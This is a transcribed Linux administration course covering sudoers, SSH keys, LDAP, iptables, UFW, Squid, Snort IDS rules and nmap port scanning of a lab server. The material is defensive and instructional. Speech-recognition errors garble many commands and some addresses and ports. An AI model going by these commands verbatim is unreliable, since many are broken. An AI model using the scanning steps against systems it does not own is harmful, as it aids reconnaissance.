the temporary file that we were just editing with vi-sudo. So there's user jgold's listing to be able to run fdisk. By the way, if you don't know where a binary is, you could issue the command where is. For example, where is fdisk? And here it's coming back and telling me where the binary is, and even where the compressed man page or help page is for that command. Now we need to test this out. What we're going to do is we're going to switch to user jgold and try to run fdisk with and without sudo. su-jgold to switch to that account. Okay, we are now jgold. If we simply run fdisk-l, we get the permission denied stuff that we saw previously. If we run sudo fdisk-l, it's normal the first time you do this for it to ask for that user's password. So I'll put in jgold's password. And sure enough, the command is working. So if you need to specify specific commands, binaries that should be runnable by regular users that otherwise can't run them, you can go ahead and modify the sudoers file with vi-sudo. In this demo, I will be configuring SSH remote management. We know that SSH, or Secure Shell, is a secured encrypted way to remotely connect to another Linux host to remotely manage it. And this would be in place of using less secure protocols that send everything in plain text like telnet or our login. So what we're going to do then is we're going to start on the client machine. What that means is this would be the technician's Linux station from which they will SSH into the server remotely over the network located elsewhere. So on this server, I'm going to switch to the user account that I want to enable SSH remote management, basically SSH public key authentication for. So I'm going to run su /jgold. I have a user account on this host called jgold, so I'm going to switch to their account. And I'll clear the screen, pwd print working directory. We're in the jgold home directory on this host, Ubuntu 2, which we're calling the client. Now over here on Ubuntu 1, a different host, and this is going to be the target that will be SSH'd into from the client. If I do an ls of /home, notice that we also have a jgold subdirectory. So we have a jgold user account on both machines. In a larger enterprise, you might only have one occurrence, one instance of the jgold user account in a central directory service like LDAP, for example. But in this case, the account exists on both hosts as a local Linux account. So back here on Ubuntu 2, which we call the client station, I'm going to run the ssh-keygen command. Now this command will generate a unique public and private RSA key pair. And we're going to be using this for public key authentication over SSH. Now instead of just having the knowledge of a username and a password to make a remote SSH connection, this will add another factor for authentication to make it harder for malicious users to crack into because they'll have to possess the private key, in addition to having knowledge of a username. So I'm being asked to enter the file in which to save the key. Now this is the private key file. Notice what it wants to do. It wants to put it in the user's home directory in a hidden directory called .ssh. Hidden directories are prefixed with the dot. And within there, it wants to call the file ID_RSA. I'm okay with that. So it's created that hidden SSH directory, and it wants me to enter a passphrase to protect the private key file, the ID_RSA file. So I'll go ahead and enter a passphrase. And I'll enter it again. Okay, it also has a reference here to the fact that my related public key has been saved in that hidden SSH directory. Its file name is id_rsa.pub for public key. Okay, and that is correct. If I do an ls here of .ssh, those are the two files that are there, the private key and the public key. The private key must reside here on my client admin station in my home directory in the hidden .ssh directory. But the public key, which is currently on this machine, we need to get that to the server that we want to SSH into. And on the server, it needs to be in my home directory in the .ssh hidden directory specifically. It needs to be placed in a file on the server in the hidden SSH directory for my user account called authorized keys. Now, I could manually copy the file over using any mechanism I choose, but there is an SSH command that's designed to copy public keys from the local host to the server. So to do that, I'll just run ssh-copy-id. Now I have to specify the credentials for the user account, so jgold is the username, @ and here on Ubuntu One, I'll run IPA to get the IP address of that server, 10.0.0.4. So at 10.0.0.4 back here on the Ubuntu 2 client machine, and I'll press enter. Now, as usual, the first time you SSH into a server, it asks if you trust its fingerprint. Are you sure you want to continue connecting? I'll type in yes and press enter. So, of course, it's asking me to provide jgold's password, so I'll put in the password, and that's on the target host. Okay, it says number of keys added, 1. And it says now, try logging into the machine with SSH jgold at 10.0.0.4. Because here on the server, if we do an ls of /home/jgold/.ssh, okay, let's give that a go. SSH jgold. I'm currently signed in as that account locally, but I want to connect remotely with that account at 10.0.0.4, enter. What it's asking for is a passphrase for my local private key. It is not asking for the password for jgold on the target server. So I'll enter that passphrase. And then that's it. I am in. Notice my command prompt has changed to reflect that I am now connected to server Ubuntu One. If I do pwd print working directory, we're in the jgold home directory. If I do an ls-a, there's the .ssh directory. Let's change directory into it to take a peek. Clear the screen, ls. There's the authorized keys file. Well, we need to take a look at that. Cat authorized_keys. Enter. So this is where we have our SSH public key. As we know, that needs to reside on the target server you're SSHing into, where the private key is stored on your administrative client station. In this demonstration, I will be installing and configuring an LDAP server. LDAP stands for Lightweight Directory Access Protocol. It's normally accessible over the network through port 389 on TCP, or if it's a secured connection, over port 636. But those ports really could be anything. Those are just the standard ports. LDAP serves as a centralized network directory. It's a database containing network configuration objects, such as user accounts. Therefore, we could set up an LDAP server with user accounts to allow users from hosts over the network where the LDAP client is installed to sign in with their centralized LDAP client account. So the first thing we're going to do on this host, which is named Ubuntu One, is we're going to be setting it up as an LDAP server, but we really want to make sure we set the host name on it correctly first. So I'm going to run sudo hostname ctl set-host name. We're going to call this Ubuntu One, and I'll press enter. Then I'm going to run sudo nano, the nano text editor, /etc/hosts, and we're going to make sure we have an entry here for this host's IP address, 10.0.0.4, and we're going to add Ubuntu One. I could have added just Ubuntu One on the previous line where we already have the server's IP, but a separate line is fine as well. So I'll go ahead and save that to that file. And the next thing I'll do is run sudo apt install, and the LDAP server components I will install will include slapd space LDAP dash utils. So I'm installing 2 packages at once with one command. It asks down at the bottom, do you want to continue? Because it's going to take up some disk space. Yes, I do want to continue. I'll type in the letter Y and I'll press enter. So I'm prompted to enter the administrator password for the admin account in my LDAP directory. So I'll go ahead and enter an administrator password, and I'll press enter. Then I need to confirm it, and I'll press enter on that. Okay, so it's installing those LDAP components for me now. To verify that that installation was successful, I'll run sudo slapcat, and I'll press enter. What this will do is return some basic LDAP information here about my installation. And if it returns back this information, including the distinguished name, the DN, which of course we've not yet configured, if it returns back the creator's name being common name or cn equals admin, comma, DC or domain component equals no domain, we are good. And if I enter the sudo service slapd status command, it's showing that the LDAP server is active and running. But really, we've not yet configured it with anything specific to our installation. For that, we're going to run sudo dpackage-reconfigure slapd. It says if you enable this option, no initial configuration or database will be created for you. Omit Open LDAP server configuration. No, we do not want to omit it. Okay. So now it asks us for our DNS domain name, which is used to construct the base distinguished name of the LDAP directory. So let's set that to quick24x7.local, and I'll press enter. The organization name, well, let's put in quick24x7, enter. The administrator password, we're going to enter one, and we'll confirm it. It says you want the database to be removed when slapd is purged. I'll accept the default of no and press enter. It states that there's an old database, the default one as part of the install. Move the old database. Yes, I'll press enter. So it's creating my LDAP directory. If I run sudo slapcat, press enter, notice now instead of the default no domain stuff we had initially, our LDAP directory is now showing that the distinguished name here up at the top is DC, domain component, equals quick24x7, comma, DC equals local. The next thing we can do is run sudo nano, and we can take a look at the /etc/ldap/ldap.conf file. So here we've got a bunch of LDAP default settings, like the size and time limit settings for returning results when LDAP queries are received. What I want to do here is uncomment the baseline here and make sure that this reflects what I've configured, where the domain component is quick24x7, comma, domain component equals local in my case. And I'll uncomment the URI line and just replace the DNS name with my server name, which is just Ubuntu 1. That's resolvable to the IP address. Notice here, it's going to be listening for those types of queries on port 666. That can be changed to whatever it is that you want it to be. The normal listening port here, unless you're using an SSL type of connection, is port 389. I'm going to put that in there. And that's all I'm going to do here. I'm going to close and save that file. And I'm going to run sudo ldap search -x just to do a quick simple search to at least make sure the server is responding to these types of requests. The next thing I'll do is run sudo nano to open up a file I've already created called ou.ldiff. LDIF files can be applied to an LDAP directory to add entries like OUs or user accounts, or to modify them, or to remove them. The default is to add unless you specify the change type parameter. So here, in this file, I've got DN in lowercase letters, :, space, and then I've got the distinguished name, the DN, of a new OU I want to add to my LDAP directory. OU equals HQ, comma, and then I've got DC for domain component, equals quick24x7, comma, DC equals local. Next line, I have object class, one word, where class is spelled with the capital C, : space top, top is in lowercase. Next line, object class, again, class, the capital C, : space, organizational unit, all lowercase. And then the next line, OU : space HQ, all lowercase. I want to create the HQ for headquarters, organizational unit, or OU. And I could add multiple entries here, each separated with a blank line, but I'm just going to create the one. So I'll get out of here and I will run sudo ldap add -x-D. Then I have to authenticate to my directory. So cn for common name equals admin, comma, DC equals quick24x7, comma, DC equals local, then -W, -f, and I'll point to my LDIF file, ou.ldiff. When we press enter, we'll be prompted to authenticate to our LDAP directory. So I'll enter the LDAP password for the admin account. Okay, and it will have added the new entry for the HQOU. We can verify this with sudo /cat. What we've got now is a new entry for our organizational unit. It wasn't there previously. In the same way, if we were just to do an sudo ldap search -x, it's going to be returning the HQ organizational unit. We'll take a look at setting up an LDAP client in another demo. In this demo, I will be installing and configuring an LDAP client. LDAP, of course, is the Lightweight Directory Access Protocol. We've already set up an LDAP server, a centralized network database essentially, where we can have user accounts, and that means that we can have user devices, Linux hosts, authenticate with a central LDAP user account instead of having to authenticate with a local Linux account. If you think about it, if I've got a user such as mbishop, and I want that user to be able to sign into many machines over the network, I only have to create that account once centrally in LDAP, as long as those Linux hosts are configured correctly as LDAP clients. And so that's what we're going to focus on here, how to get an LDAP client up and running. Now, I happen to be doing this on the same host that is the LDAP server, but it doesn't make a difference as long as traffic over the network is allowed, for example, to port 389, the default listening port for LDAP. We also have to make sure that we can ping the LDAP server by name or connect to it by IP address and that it will respond correctly. Now, if you don't get a response from ping, it might be that the firewall is blocking ICMP. But again, port 389 traffic is the standard port used by LDAP. On the LDAP server, if we were to do an sudo service /d status, we would see whether or not the Open LDAP server daemon is up and running. Here it is, it's active and running. If we were to run sudo /cat, we'd be able to see the objects that exist within the LDAP directory. So my directory here is quick24x7 local. Those are the domain components or DCs. But I've also got an HQ for headquarters organizational unit shown here as an OU. And within HQ, I've got a couple of users like mlin, that's in HQ. I've also got an account here such as LDAP user 1. And LDAP user 1, for instance, notice, also has a number of Linux-specific attributes here, such as the login shell, the user ID number, the group ID number for the primary group of this user, the home directory location for this user. I've also got a group down here called sales group, which has a group ID number of 2000, which corresponds with the primary group number up above for LDAP user 1. So this already exists here on the server. If I were to do an sudo nano of the user.ldiff file, this is a file I created and called as such. This is the definition file for the creation of my users and groups. And that file is applied to my LDAP directory to add those objects, to add those users and groups using the LDAP add command. With a $x, $D, I specify the admin for my LDAP directory, and then $W, $f, and then the name of the file, user ldiff. That's already been done to add those to my directory. What I've also done is run sudo LDAP password, where password is spelled PASSWD with a $H, and then I've specified the LDAP URL for my server, which is Ubuntu 1, $x, $D. Then I've got the credentials for the admin, $W, $S, and then I've got the user ID whose password I want to set. Here I've set a password for LDAP user 1. So that's how that stuff comes about in an LDAP directory. So I need to install some software here. sudo apt install libnss-ldapd libpam-ldapd and ldap-utils and then $y for yes. And enter. Okay, at this point, I'm prompted for the LDAP server URI, so I'll just specify Ubuntu 1 and enter. And the LDAP server search base, I can specify as DC equals quick 24x7, DC equals local. I could also put in, of course, if I want to have the search base set further down in the hierarchy, I could put OU equals HQ, and then have my domain components listed after. I'll press enter. I want to make sure I configure The password, command group, and shadow, these are services that should use LDAP. I'll press enter. And then using a text editor, if you go down to /etc/pam.d/common-session, you can add a new line as I have here at the bottom that says session, optional. Then we're referring to the pam_mkhomedir.so file. We're setting the skeleton variable to /etc/skel. So any files in there will be copied to the new user home directory. And we're setting a umask to set the default file permissions to be equal to 077. And then we have to restart the two client daemons for LDAP, NSCD and NSLCD. You can do that using systemctl or the service keyword. It really doesn't matter. Or if you wanted to, you could reboot the system. But either way, we are ready to test it. If I were to do an sudo cat/etc/password, and let's say we grep that for LDAP user 1, there's no local LDAP user account. Yet, if I run su -- to switch user, of course I could just reboot the system or log out and completely log in as an LDAP user. You don't have to just do it through su. So LDAP user 1, it knows about it because it's asking for the password. But there's no local LDAP user 1 account on this Linux host. That is the entire point with LDAP. It's stored on the LDAP server centrally. I'll just go ahead and enter the password for that account, and I'm in. It's created a directory under /home for my LDAP user, and of course, I am currently signed in as my LDAP user. So that's how you go about configuring an LDAP client on a Linux host. In this demo, I'm going to be configuring a Linux packet filtering firewall using IP tables. IP tables has been around for quite a while, and it was the standard for having a built-in packet filtering firewall in Linux. But over time in different distributions, that has been changed a little bit to include other tools, such as the uncomplicated firewall or UFW. Nonetheless, it's important as a Linux technician to understand how to work with IP tables. Let's get started. First thing I'll do is run sudo IP tables -L -V for verbose and -N for numeric. The numeric part means that any IP address information and port number will be shown with their numeric values as opposed to a textual equivalent, for example, displaying 22 instead of SSH. So here we've got the input chain with no configurations. As you might guess, this means traffic coming into a given interface on this host. A true firewall is going to have more than one network interface, so 2 or more. And so we can define what kind of traffic is allowed coming in through a particular interface. Forwarding means going through the firewall, and output, of course, means leaving the firewall through a given interface. But we don't have anything here yet. So I'm going to run sudo IP tables -A. So I want to add to the input chain. Now -interface. Now, if you don't know what your interfaces are, of course, you could always simply run IP space A. Our interface here is called ETH0. So let's start that again. sudo IP tables -A input, those are in caps, -i, ETH0 is our interface, -P. Let's say I want to specify a protocol of ICMP and I want to jump to the accept action. So -j and the word accept in uppercase letters, enter. If we use our up arrow key to go back to our listing command with the -L for IP tables, notice now in the input chain, it shows that we are accepting the protocol of ICMP coming in through interface Ethernet 0 out any interface. So we have an asterisk under out. We didn't specify a source or a destination, so they're set to the defaults for IPv4 of 0.0.0.0/0. Now, if we do an IPA of this host, it's got a private IP address of 10.0.0.8. Let's try to ping it from another host on that same network, since ICMP traffic should now be allowed. Okay, I'm on a different host, and if I type IPA, this one has an IP address of 10.0.0.4. So if I ping 10.0.0.8, of course, we get the 64-byte reply from that host because we just created an IP tables rule that will allow that traffic. So I'll press Control-C, and I'll clear the screen. Let's go back to our original host. So back on our original host, now they both happen to have the same name in the command prompt, but they are different machines on that subnet. Okay, I'm going to now run sudo IP tables -A input
dash lowercase I eth0 interface. And once again, let's specify dash p of ICMP, but this time I would like to run dash j, lowercase j for jump, and the action I want to jump to is drop. So I want to drop ICMP traffic now, not accept it. If we use our up arrow key to go back to our listing command, notice that we added the drop, but the accept command is still there. So what we could do is run sudo iptables dash capital D for delete, input for the input chain, dash I for eth0, dash p for ICMP and dash j, and then accept, enter. If we clear the screen and once again do our listing, notice now the only rule shown here is the drop rule. And if we flip back to our other Linux server, which has a different IP address, and once again, if we ping 10.0.0.8, this time we are not getting a reply, naturally because we told IP tables in the input chain on that interface to drop any ICMP packets. I'll press Control C to stop that, and let's return back to our original host. As another example, I can run sudo iptables, but this time I'm interested in specifying a specific port number that I want to accept. So dash A, input, dash interface eth0, dash P, let's say TCP is a protocol this time, and dash D port for destination port of 80, just standard HTTP web server traffic. And we'll run dash J, accept. And if we list our rules again, we've now got an accept rule in the input chain for that interface destined for port 80. So if we had a web server stack running on this host, we would now be allowing traffic from anywhere to the web server running on this machine. In this demo, we're going to take a look at how to work with the uncomplicated firewall, otherwise just called UFW in Linux. So UFW seems to have become more and more common in many Linux distributions, thus replacing some of the older type of packet filtering firewall standards like IP tables. However, IP tables, even on newer Linux distros that don't use it, can still be installed as a package, of course. But let's focus on UFW. First thing I'd like to do here is run sudo UFW status. I'm using a newer version of Ubuntu Linux, which includes uncomplicated firewall by default. It's automatically there. So currently, the state is being returned as being inactive. So in other words, the entire packet filtering firewall is down. I can run sudo UFW enable. I get a message stating that that may disrupt existing connections over SSH, like the one I'm using right now. Should we still proceed? I'll type in yes or Y. Okay, it says the firewall is active and enabled on system startup. Now I knew there were no configurations that would block my SSH connection, so we're safe. So if we use our up arrow key and go back up to sudo UFW status, now it shows as being active. If I were to run sudo UFW app list, this will give me a listing of any standard apps, in this case OpenSSH, which of course uses port 22, that are allowed through the firewall. I could also run sudo UFW status verbose. This just gives me some settings such as the default being deny for incoming traffic, allowing outgoing traffic, and we've disabled routing through the firewall. Now if I were to run sudo UFW allow Apache, it comes back and says it could not find a profile matching Apache. Well, that's because it's not installed. If I were to actually install that, let's say sudo apt install Apache 2, and I'll choose yes to continue the operation. When you install some packages, you get additional capabilities when it comes to app names that you can enable for the uncomplicated firewall. So for example, if we use the up arrow key to go back up to sudo UFW allow Apache, now it works. So therefore, if we were to run sudo UFW app list, not only do we have OpenSSH as we did previously, but now we've got a couple of entries here for the Apache web server. Now, of course, you can do it by port number. You don't have to rely on these named lists. If I were to do sudo UFW allow, and if we've got an LDAP server perhaps listening on port 389, then I could specify that we want to allow that item. And it says rule added. So of course, if we take a look at our app list, we have the original app list, but we do not see our newly added custom rule for just a port number. And if I were to do an sudo UFW status, let's say numbered, so we have line numbers next to the rules, the new rules I've added here will show here. So we've got some variations on Apache for IPv4 and IPv6, where the action is to allow in from anywhere. And we've also got our port 389 rule that we added by port number for IPv4, which doesn't list anything after the port number, and v6, of course, means for IPv6 to allow that type of traffic. You can also run commands such as sudo ufw allow. Now, what if I want to add a specific port number, but also specify the protocol or the transport mechanism? Let's say we're doing remote log forwarding in Linux, which normally uses, at least by default, port 514. Well, yeah, but over TCP or UDP? Well, it really depends how you've configured it. So we can get specific and say we want this over UDP. Enter. Notice again, by default, it adds a rule for IPv4 and v6. So if we go back to sudo ufw status numbered, we've now got our 514 rules. The other good thing about having these numbered is that you can also delete any of these firewall rules given the number. For example, if I want to remove the 514 UDP rule for IPv6, I could do that with sudo ufw delete. Now, what rule number is that? Well, according to our output, it's rule number 6. We'll just put that in, proceed, yes. And if we take a look again at our status of our rules numbered, the 514 port number rule for IPv6 has been removed from the list. You can also allow or deny from specific IP addresses or ranges. For example, sudo ufw allow from, and I could specify a specific range from which I would like to allow connections. I can use CIDR notation with the slash and the number of bits in the mask if I choose. I could also specify individual IPs, and instead of allowing from, I could also deny from. So it says rule added. And so once again, if I go back to sudo ufw status numbered, we've now got our rule here that allows access to anywhere from our listed subnet range. So this gives us an idea then of how we might work with the uncomplicated firewall to determine what traffic is allowed into a given Linux host. In this demo, I'm going to be deploying the Squid proxy server. So Squid is a free and open source proxy solution that you can run on a Linux host. So we're going to go ahead and take a look at exactly how to do this. Now, thing to bear in mind is that when you're deploying Squid in a production environment, as opposed to just testing, then you might want to make sure you have at least 2 network interfaces configured for your server, whether they be physical NICs or virtual network interface cards, whatever the case might be. Because remember, normally a Squid proxy takes internal client requests and goes out on behalf of those requests to fetch content for those clients. That's the classic definition of a forward proxy. So here in Ubuntu Linux, we're going to begin by running sudo apt update to make sure our package repositories are up to date so that we'll definitely know for sure what is available for software that can be installed. After which we can then run sudo apt install squid. I'm then asked if I would like to continue, of course. I will type in Y for yes and I'll press enter. The next thing I'll do is take a look at the Squid configuration file. So to do that, I'll run sudo nano. I'll use my nano text editor to open up /etc/squid/squid.conf. There's a reference at the top here for where to go for documentation. This is always critical. Unless we do this every day, and assuming things never change or get updated, it would be fine to memorize exactly how to configure every aspect of everything. It's just not reality. So always take a look at the documentation links when you get stuck or you need to configure a product in a particular way. As we scroll down through this, you'll see exactly why I say this, because there are so many configuration options for the Squid proxy. Within the squid.conf file, you will find a section where it has a number of settings for HTTP_access. Now, if you're using the Nano editor, which I am, you can press Control-W and you can tell it to search for something like HTTP_access, as opposed to looking for it manually. I'll press Control-C for cancel. Notice here that one of the default settings is that HTTP_access is set to allow for the local host for the Squid proxy server itself, but not for the local net. And you can modify what local net means by adding your own internal IP network ranges. Of course, notice that that HTTP access allow local net line is actually commented out. And down below, HTTP_access deny all is also enabled. So that's the default. It's kind of a pessimistic approach by default where things are blocked. If you search the squid.conf file for HTTP_port, notice that the default listening port for the proxy is 3128. So depending on how clients are connecting, they'll have to be configured with the appropriate port number. Or if you're testing it at the command line, let's say, even using the Linux curl command, this is going to be important to know. You can change it. That just happens to be the default setting. And if I were to search for ACL space localnet, this is where we've got those localnet definitions that we're showing down below in the access rules, where we said you could make a modification here to specifically add your internal IP address ranges that are in use. What's here automatically are the standard private IP address ranges that aren't routable on the internet, but certainly you can make changes here as appropriate. So if you're already using something in the 192.168 range, you're already good to go. Machines on that type of network prefix will be able to go through the proxy server. I'm going to press Control X to get out of there. I'm not going to save any changes, but it's also important to remember that you have to enable your firewall to allow traffic destined for port 3128. One way to do that here in Ubuntu Linux, where the uncomplicated firewall UFW is here by default, is to run sudo UFW allow, and in single quotes I'll put in squid. And because I've installed squid, it knows what I'm talking about. So if I do a sudo UFW app list, notice squid is showing here as traffic that is allowed to go through our UFW firewall. Let's have a little bit of configuration fun. We're going to configure this Ubuntu desktop client machine, which is on the same subnet as our squid proxy. So as we know, it means it should be allowed to go through the proxy without doing anything. And on the server, as long as our squid service is running, so sudo service squid status, here it is active and running. We know it's listening on port 3128 by default. That's all we need for our internal clients. So back to the client, why don't we go ahead and configure Firefox here to use our proxy. So I'll open up Firefox. I'm going to click on the right here and go all the way down to settings, and I'll search for proxy and I'll click the settings button. So currently there's no proxy. Let's pop in the IP address of our squid proxy. I know what it is here, 192.168.2.156. If we just go back here to the server and do an IP space A, indeed, it's 192.168.2.156. And while we're here in our Ubuntu desktop client, let's just pop into a terminal window. If we type in IPA, again, we're on the same subnet here, 192.168.2.40. So 24-bit mask, we're on the 192.168.2 network. Okay, so let me put in an incorrect port, first of all, just so we have a way to easily prove that the squid proxy is working. So I've popped in port 3127. I know it's really listening on port 3128. Let's see what happens. Okay, so we've got a manual proxy configuration here pointing to the proxy server's IP, but the wrong port. So if we try to do something like go to Google, it says the proxy server is refusing connections. Now we can configure authentication for the proxy as well. We didn't do that, but the reason that this is failing, as I'm sure you will guess, is because we're pointing to the wrong port number. So let's go correct that in our Firefox settings. We know that the squid proxy is actually listening on port 3128. Okay, let's set that. Let's try to go to Google again. And after a moment, and I may have to refresh the web page or exit the browser and come back in, but now the Google page pops up because, of course, we are now pointing to the correct proxy server port. What we're doing is protecting clients so they don't have a direct connection to the internet. Everything out on the internet looks like it's coming from the proxy server. So this is a standard forward proxy configuration. It's not a transparent proxy configuration, is it? Because we had to configure the proxy server identity. A transparent proxy means it's the default gateway IP. So that's not the case here. But nonetheless, the squid proxy is working. In this demo, I'm going to be installing and configuring the Snort IDS. IDS, of course, is Intrusion Detection System, and Snort is a free open source solution for just that. It'll run on multiple platforms, but of course, we're going to focus on having it run on our Linux host. The purpose of an IDS is to detect suspicious activity and report on it. Either send alarms to admins or log it. And if you have IPS capabilities also, intrusion prevention system, then you can also configure mitigating actions when suspicious activity is detected, such as blocking certain IP ranges. We're just going to do a basic configuration in Snort to make sure that we can capture some kind of traffic and at least write a message to the console, which in turn also gets logged. Okay. So the first thing I'm going to do is I'm going to run sudo apt update to make sure my repository listings for software packages is up to date. Okay, and once that's been done, I'll run sudo apt install snort. Press enter, and when it asks, do you want to continue? I will type in the letter Y for yes and press enter. Okay, so it asks me to configure Snort a little bit. It talks about using the CIDR form notation for network ranges, which uses the slash at the end of the network address with the number of bits in the mask. Or if you want to just use one single IP, you can go ahead and do that, followed by /32. But maybe, for example, you want to detect traffic coming from a certain network range or going to it. Well, you could then use the CIDR notation for that. I'll just press enter to accept that. And it then asks, what's the address range for your local network? Well, in my case, it's 192.168.2.0 with not a 16-bit mask, but rather a 24-bit mask, which means the first 3 octets, in my case, that's 192.168.2, identify the network. Okay, I'll just use the arrow key to go down to OK, and I'll press enter. I can always change that later anyway. All it's doing is establishing a value for the home network variable. Now that we've got that installed, let's go in and take a look at the config file. Let's look at a couple of things, actually. Let's start by changing directory into etc/snort. And in here, if we do an ls, we've got a couple of config files, but we also have a rules directory. See that here? If I change directory into rules and do an ls, here we've got all kinds of standard rule files for different types of suspicious activity that your Snort IDS will look for. Whether it's for specific viruses with certain behaviors or signatures, certain types of web attacks, whether it's suspicious activity related to the attempted exploitation of MySQL databases, or if you want your IDS to detect any activity on the network related to pornography, there is a file that will detect that as well. And you can update these locally. You can download various types of rule files from the Snort community. For example, in a browser, if I navigate to snort.org/downloads, from here, I can scroll down to the rules section of that web page where I can download a compressed tar archive of the latest rule files. However, if you've updated your repositories when you installed Snort, you will have the latest version of those. However, after you have Snort installed and running for a while, you might want to come back here and take a peek to see if there are any new rule files that you would like to include. And now you know where to put them. Let's take a look at one of them just for fun, like the community-bot rules, where a bot is basically a zombie computer that's been infected and is now under the control of a malicious actor. So I'm going to clear the screen. Let's cat the community-bot.rules file. Let's pipe that to more. So notice we have a number of alerts here looking for the TCP protocol from our home network, any port going to external networks. Now, these are variables. Notice the $ prefix that we can configure within our snort conf file. But think about what happens when you have an infected machine or a bot. It talks on the internal network in a direction going outward. If all your firewalls are doing is focusing on watching what's coming in but not what's going out, that's a problem. And so intrusion detection systems, of course, not only watch what's happening on the network or coming in, but what's leaving hosts in case they're infected. So we have specific messages that are generated when certain types of traffic are detected. Notice what it's doing is looking for an established TCP connection. That's the value of flow, and the separator here is colon. But then it's checking to see if there's any content in that transmission, like where it's trying to go and make a connection. So we've got numerous entries that look for this type of thing. Let's quit out of that one. Let's take a look at one more. I'll just do an ls. Why don't we cat the MySQL.rules file, pipe that to more. And as we go further down, this one's quite short compared to some of the other ones. But we have MySQL root login attempts. So notice the flow here has a value of an established TCP connection to the server, and it's actually looking inside the packet for a specific sequence within the HTTP content. Now we can also create our own root files, certainly. Just for fun, why don't we run sudo nano? We're already in the rules directory. The file must be called local.rules. If you call it something else like banana.rules, for example, it won't get picked up by Snort automatically. So in here, I've already got a couple of examples here. The first is an alert rule for ICMP traffic. So commands like traceroute and ping from other hosts would trigger this from any location, any port going to any device on my home network. So I'm going to generate a message that's going to say testing ICMP. I've got an ID assigned to it, a revision value, and the class type has been set to ICMP-event. Now these things like the class type become very important when you start using other front-end tools to sort through, search, or analyze all of this Snort data. Remember, think beyond what we're doing on a local host. You might use Snort on numerous Linux hosts, but then that data might be ingested by a CM solution elsewhere that analyzes it looking for suspicious activity, or just takes the alerts generated from these Snort hosts and then presents them in some kind of dashboard visualization. At any rate, our second rule here is simply looking to see if Telnet is being used. So instead of ICMP, it's checking TCP from anywhere, going to somewhere on our home network, that's a variable, port 23, and it'll say Telnet connection attempt. So let's go ahead and press Control X to save out of that. We can test the syntax in our snort config files by running sudo snort-T for test-I for interface. My interface on my snort host is called ENS33. I know this. -C for the config file /etc snort/snort.conf and enter. So it says snort successfully validated the configuration, snort exiting. That's great. All we're going to do is change that snort-T for testing to A. We'll add the word console to write out messages to the console, and we'll leave the rest as it is. If I press enter, it'll load the rule files, and look right away. It says testing ICMP. So it looks like there's some host at 192.168.2.40 that's sending ICMP traffic to this host at 192.168.2.156. That is in fact correct. Here, I'm at a different host on the network running Ubuntu desktop where I've got a terminal window and I am pinging 192.168.2.56. If I do an IPA, of course, this is indeed 192.168.2.40. So that gives us a basic idea then of how the snort components work together and how to load it up on a Linux host. Have you ever noticed in Linux that somehow magically when you create a new directory or a file or copy files to a directory, permissions are set automatically by the Linux kernel? Well, that is controlled via the umask setting. What we can do with umask is take permissions away from what the kernel normally wants to assign by default. So, for example, if the kernel wants to assign, let's say, 666 permissions. Now, 6 stems from 4 plus 2. 4 is read, 2 would be write. That would be read-write for the owner, read-write for the owning group, and read-write for everyone else. Now, if that's what the Linux kernel wants to do by default, what we could do is set a umask, let's say, to 022. I'm not setting the umask by just typing these numbers in. I'm just using this as a whiteboard. But what happens is we subtract the umask from the default kernel permissions. Let me give you an example of how this really works. Why don't we start by just running the umask command by itself? So notice it returns 0002. Well, let's ignore the first 0. That's for the special bit position, whether it's the special user ID bit or the group ID bit or the sticky bit. I'm only concerned with the last 3 digits. So for the owning user, owning group, and other, it's 002. Let's examine what happens if we use the touch command to make a new file that we will call newfile1.txt. If I do an LL of newfile1.txt, notice the default permissions. So for the owning user, the default permissions are read, write, and that's it. Well, if the default Linux kernel permissions are 6, which is read, write, and we have a 0 in that position, the second 0 here in the umask, we are subtracting everything. So what remains is 6. 6 minus 0 is 6. Read, write is 6, because read is 4, and write is 2. 4 plus 2 equals 6. The same thing, the same type of logic would apply to the group permissions here, read, write. Well, in the group position here, so the third 0 here, because remember the first 0 we're not looking at right now, 6 minus 0 is 6, we end up with 6, read and write. But for other, the last position here, our umask has a value of 2. 6 minus 2 is 4, isn't it? What a coincidence. That's the numeric value for read, or R. So that is the correlation between the umask and default permissions. But if you really want to, you can modify the umask. Let's say you decide, look, I don't want other, which is the last 3 permissions here. I don't want that set to anything. I only want the owning user to have permissions and the owning group. Well, what would I have to set the umask to then to remove that read? Well, we know that 6, which is the default the kernel wants to assign, minus 2 is 4, which results in R. How do we get that down to 0? Well, I don't know. Why don't we change the umask from 002 to 006? So let's run umask, the first 0 for the special bit, then the next 0. We don't want to take away any permissions for the owning user or the group, so 3 zeros, but then 6. So if we just type umask by itself, now our umask is 0006. I wonder what would happen if we created a new file now. Touch, new file 2.txt. Let's just do an LL of things that start with new. So new file 1, remember how other had permissions in the form of read? Well, now with new file 2,
what's been automatically set is that other have no permissions at all, because we know the kernel wants to assign 6 by default, and we know that 6 minus 6 is 0, which results in no permissions at all in that position for other. Now, you could set the umask, for example, in your login script file if you really wanted to. If I do an ls-a, I've got a hidden file here called .bashrc. So if I wanted to, I could sudo nano.bashrc. And this is where we can put in any settings that we might want to execute upon sign-in, including the umask, but certainly not limited to that. So let's test out that behavior. So right now, if I type umask, it's set to what we've just configured it for, so 0006. If I do an su dash to do a full login for user C Blackwell, I'm just opening up another session for the same user just so we can test this without logging in and out. In that new session, if I type umask, we're back to the default. Okay, let's exit out. Let's go back into sudo nano and into the .bashrc file, and at the bottom is just as good a place as any. Let's set the umask to 0006. Control X to save that out. Let's once again do an su dash to C Blackwell, and we type in umask, and now it's set to 0006. So if you want this set as a default, and you might for security reasons to prevent others from automatically having read access to newly created files, then this might be something that you would consider. In this demonstration, I'll be using the Nmap tool to scan Linux hosts looking for open ports. Now, I'm sitting at my Linux server, so I'm going to go ahead and type IP space A so we can see what the IP address is. Server IP is 192.168.2.156. In this example, I'm going to be using a different Linux host, and I'll be scanning this one. So let's switch over to our other Linux host. I've switched over to my Ubuntu desktop client machine where I'm going to run Nmap scans against my server. So the first thing I'll do here is make sure it's installed. If I were to run, let's say, sudo apt install Nmap, if it's not installed, and here it wants to install it, then we can install it in this way. With some Linux distributions, you'll find that Nmap is automatically included. That's definitely true if you're using something like Kali Linux. Okay, so at this point, if I were to run man nmap to look at the manual page, it knows what I'm talking about. And of course, it's important to know what the command line switches are here when using this. And notice that there are a lot of them for nmap. I'll press Q for quit. Let's go through a few examples. I'm going to run sudo nmap, and I can specify either a host name or an IP address or multiple hosts, multiple IPs. Let's start with the basics. I'll put in the IP address of our server, 192.168.2.156. I won't pass any other command line parameters. Let's just see what we get for output. So this is a very quick way to determine what is running on that target. We have here the SSH daemon listening on TCP port 22. We have a DNS server listening on TCP 53. We have the Squid HTTP proxy also listening on 